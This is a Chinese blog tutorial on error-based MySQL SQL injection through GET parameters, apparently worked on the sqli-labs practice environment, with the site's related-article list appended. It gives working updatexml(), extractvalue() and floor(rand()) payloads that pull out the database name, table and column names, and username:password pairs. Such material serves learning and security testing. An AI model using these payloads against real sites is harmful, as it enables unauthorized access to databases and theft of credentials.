GET基于报错的注入

最新推荐文章于 2022-04-30 20:41:12 发布
最新推荐文章于 2022-04-30 20:41:12 发布
阅读量398 收藏 1
点赞数 2
分类专栏: sql注入 网络安全 文章标签: 数据库 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40710190/article/details/109106347
版权

GET基于报错的注入

这个标题跟我另外一篇《报错基于GET的注入》非常像,但是要分清楚了,这2个注入base基于的点是不同的。
报错注入形式上是两个嵌套的查询,即select…(select…),里面的select被称为子查询,他的执行顺序也是先执行子查询,再执行外面的select,双注入主要涉及到了几个SQL函数:

  • rand()随机函数,返回0~1之间的某个值

  • floor(a) 取整函数,返回小于等于a,且值最接近a的一个整数

  • count()聚合函数也称作计数函数,返回查询对象的总数

SQL COUNT(*) 函数

定义和用法

COUNT(*) 函数返回在给定的选择中被选的行数。

语法

SELECT COUNT(*) FROM table

例子

NameAge
Adams, John38
Bush, George33
Carter, Thomas18

例子 1

本例返回 "Persons" 表中的行数:

SELECT COUNT(*) FROM Persons

结果:3

例子 2

返回大于 20 岁的人数:

SELECT COUNT(*) FROM Persons WHERE Age>20

结果:2

适用场景

前提当然是要有错误提示了,不然题目为啥有个基于报错呢?但是输入正确后,却无法显示数据的情况下比如下面这样,可以看到只显示了一个You are in… (つД`)这个时候就可以通过报错注入来获得信息了。

1.jpg

报错注入

在SQL注入攻击过程中,服务器开启了错误回显,页面会返回错误信息,利用报错函数获取数据库数据。

常用的MySQL报错函数

--xpath语法错误
extractvalue()    #查询节点内容
updatexml()       #修改查询到的内容
它们的第二个参数都要求是符合xpath语法的字符串
如果不满足要求则会报错,并且将查询结果放在报错信息里

--主键重复(duplicate entry)
floor()            #返回小于等于该值的最大整数
只要是count,rand()group by #三个连用就会造成这种主键重复报错

根据报错获取数据原理

首先了解下updatexml() 函数

UPDATEXML (XML_document, XPath_string, new_value)

第一个参数:XML_documentString格式,为XML文档对象的名称,文中为Doc

第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。

第三个参数:new_valueString格式,替换查找到的符合条件的数据

作用:改变文档中符合条件的节点的值

改变XML_document中符合XPATH_string的值

而我们的注入语句为:

updatexml(1,concat(0x7e,(select database()),0x7e),1)

其中的concat()函数是将其连成一个字符串,因此不会符合XPATH_string的格式,从而出现格式错误,爆出

错误代码:1105
XPATH syntax error: '~databaseName~'

1、尝试报错

2、获取数据库名

SELECT * FROM users WHERE id='$id' 
and 
updatexml(1,concat(0x7e,(select database()),0x7e),1)--+

--0x7e是"~"符号的16进制,在这作为分隔符
2.jpg

3、获取表名

SELECT * FROM users WHERE id='$id'
and
updatexml(1,concat(0x7e,(select table_name from information_schema.tables 
	where 
	table_schema='数据库名' limit 0,1),0x7e),
1) --+
3.jpg

4、获取字段名

SELECT * FROM users WHERE id='$id' 
and
updatexml(1,concat(0x7e,
(select column_name from information_schema.columns 
	where 
	table_schema='数据库名' and table_name='表名' limit 0,1),
0x7e),1) --+

5、取数据

SELECT * FROM users WHERE id='$id' 
and
updatexml(1,concat(0x7e,
(select concat(username,0x3a,password) 
	from
	users limit 0,1),0x7e),
1) --+

6、其他函数payload语法:

--extractvalue
SELECT * FROM users WHERE id='$id' 
and
extractvalue(1,concat(0x7e,(select database()),0x7e))--+

--floor()
SELECT * FROM users WHERE id='$id' 
and
(select 1 from (select count(*),concat(database(),floor(rand(0)*2))x 
	from 
	information_schema.tables group by x)a)--+

可以清晰的看出,这是通过子查询的select来报错获取想要信息的注入。

小莫神和他的的
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
13、报错注入(Get)
weixin_41489908的博客
12-02 181
环境sqli-labs less 5 1、我们随便输入’,看到报错信息 可以判断,需要单引号闭合 2、构造查询获取数据库名称语句 http://192.168.1.120/sqli/Less-5/?id=1’ union select 1,2,3 from (select count(*),concat((select concat(version(),0x3a,0x3a,database(),...
SQL注入知识点总结
千寻的博客
02-11 1084
文章目录第一章 概述第一节 简介第二章 SQL 注入基础第一节 漏洞原理第二节 注入点可能存在的位置第三节 漏洞危害第三章 SQL注入分类第四章 MYSQL 相关第一节 注释第二节 mysql数据库数据库information_schema第三节 MYSQL 常用函数与参数第四节 逻辑运算第五章 注入流程第一节 SQL 注入思路第二节 注入点判断第三节 联合查询第四节 报错注入第五节 ...
【计算机网络】参数包含特殊字符导致导致Http Get 请求报错
Ulrich蚊子Blog
01-18 6308
前言 在各种生产业务中,最常出现的 IO 通信之一就是 Http 访问,而其中常见的访问方法包括 Get 请求和 Post 请求。两者的基本概念和优缺点在很多文章都有说明,如果还没了解过的朋友,可以看下这篇文章: https://blog.csdn.net/sinat_36645384/article/details/107171364 从两者的对比可以知道,两者形式上最大的区别就在于参数的传输方式不同。对于 Post 请求,参数可以封装成表单,也可以格式化成 json 格式;而 Get 请求需要将参数拼接
SQL注入概述与GET注入实例
weixin_59872639的博客
02-18 1222
SQL注入概述 什么是SQL注入漏洞 攻击者利用Web应用程序对用户输入验证上的疏忽,在输入的数据中包含对某些数据库系统有特殊意义的符号或命令,让攻击者有机会直接对后台数据库系统下达指令,进而实现对后台数据库乃至整个应用系统的入侵。 SQL注入原理 服务端没有过滤用户输入的恶意数据,直接把用户输入的数据当做SQL语句执行,从而影响数据库安全和平台安全。 两个条件 用户能够控制输入 原本程序要执行的SQL语句,拼接了用户输入的恶意数据 SQL注入过程 SQL注入危害 绕过
GET和POST的区别
weixin_30645617的博客
08-28 133
1.GET把参数包含在URL中,POST通过request body传递参数。 2.GET在浏览器回退时是无害的,而POST会再次提交请求。 3.GET产生的URL地址可以被Bookmark,而POST不可以。 4.GET请求会被浏览器主动cache,而POST不会,除非手动设置。 5.GET请求只能进行url编码,而POST支持多种编码方式。 6.GET...
第四节 基于报错的SQL注入-01
09-15
GET基于报错的SQL注入发现是指通过在URL中修改对应的ID值来探测URL中是否存在注入点。实验步骤如下: 1. 在URL中修改对应的ID值,例如将ID值从数字改为字符串,或者添加特殊字符。 2. 观察服务器的响应结果,如果...
Sql注入平台.zip
02-21
一个在本地搭建的SQL注入的平台,能够进行SQL注入,适用于GET和POST场景 包含了基于union查询的注入、基于报错注入、基于floor的报错注入、基于boolean的盲注、基于时间的盲注……
基于Web的SQL注入漏洞研究 (1).pdf
最新发布
01-04
错误信息返回方法是指在注入点参数中添加单引号、双引号等特殊符号,如果出现报错信息,可能存在SQL注入漏洞。布尔判断是指在注入点参数中添加and 1=1、and 1=2等语句,如果两次页面显示不一致,可能存在数字型SQL...
SQLMAP参数介绍.pdf
09-25
通过使用SQLMAP,安全研究员和渗透测试人员能够有效地发现并利用多种类型的SQL注入技术,包括基于布尔的盲注、基于时间的盲注、基于报错注入、联合查询注入以及堆查询注入。以下是关于SQLMAP的详细介绍: 1. **...
sql注入攻击的原理和防范攻击的方法.docx
09-07
攻击者获取信息的可能采取的方式包括基于布尔的盲注、基于时间的盲注、基于报错注入等。 SQL 注入攻击防范的方法: 1. 定制黑白名单:将常用请求定制为白名单,一些攻击频繁的攻击限制其为黑名单,可以通过...
SQL中的GET显错注入
m0_69676459的博客
04-30 590
SQL中GET注入
GET注入--显错注入
jeammy06061026的博客
05-16 2080
GET-基于错误-字符型-单引号 MySQL语法问题 –后面"+"的作用? 2、单引号和双引号 双引号会把后面注释的“–”显示出来,暂时没发现其他区别
web漏洞-sql注入
CN_SHzhaoyujie的博客
12-04 344
文章目录SQL注入原理acccess+asp注入基本流程SQL注入发现注入分类注入提交方式注入方式SQL手工注入手工注入流程:实例操作过程:常见查看数据库信息的函数:sqlmap的使用常用参数针对POST方式的注入防护SQL注入 SQL注入原理 SQL:结构化查询语言,是一种特殊目的的编程语言,一种数据库查询和程序设计语言,用于存取数据以及查询、更新和管理关系数据库系统。 原理:通过构建特殊的输入...
GET报错注入
qq_43776408的博客
06-09 638
报错介绍 使用的正常的语句无法显示想要查询的数据,然后我们故意输入错的语句来强迫数据库 爆出数据来 GET单引号报错注入 以less-5为例 原sql语句 select * from admin where id=‘id’ limit 0,1 回顾一下 浏览器输入id=1正确 显示you are in 在输入id=1 显示错误 you have an error in "1’ LIMIT 0,1’ 去掉外引号 ‘1’ LIMIT 0,1 你想啊,输入1是对的 但是输入1\是错的 所以就是多出了一个\
报错基于GET的注入
qq_40710190的博客
09-28 234
报错基于GET的注入GET-Error based lesson1 Single quotes-String 判断是数字型还是字符型 这一点还是很好判断的,在有报错提示下的话。这里的例子基于sqli-labs的lesson1和lesson2。 ?id=1' 得到报错 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right synta
GET基于报错SQL注入漏洞详解
LoveStarbucks的博客
12-26 1086
GET基于报错SQL注入漏洞详解 开始前的补充知识: mysql中比较常用的一些函数: version():查询数据库的版本 user():查询数据库的使用者 database():数据库 system_user():系统用户名 session_user():连接数据库的用户名 current_user:当前用户名 load_file():读取本地文件 @@datadir:读取数据库路径 @@b...
GET基于报错的SQL注入
LuckySec
02-11 640
当前用户:select user(); 所有数据库:show databases; 当前数据库:select database(); 当前版本:select version(); mysql常用注释符:#或–空格或/**/ 空格也就是%20 内联注释:/!SQL语句/只有MySQL可以识别,常用来绕过WAF select * from articles where id=id...
SQL | GET报错注入
m_de_g的博客
12-05 812
SQL | GET报错注入 1.报错注入介绍 2.GET单引号报错注入 3.GET双引号报错注入 4.Sqlmap安全测试
1-8 GET报错注入
LoveStarbucks的博客
12-29 238
1-8 GET报错注入 1.报错注入介绍 floor报错注入的原理( https://www.cnblogs.com/xdans/p/5412468.html ) 2.GET单引号报错注入 Sqli-Lab less5 只能使用报错获得我们想要获得的信息 (2)构造报错语句 3.GET双引号报错注入 4.Sqlmap安全测试(前面的测试手写比较麻烦这个是重点) Sqlmap操作跟前面的...
getRegistry报错
06-09
如果 `getRegistry()` 报错,很可能是由于 `event` 参数没有被正确传递或引入了错误的包。请确保你正确地实现了 Minecraft 的 `IForgeRegistryEntry` 接口,并且在你的代码中正确地引入了 `...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值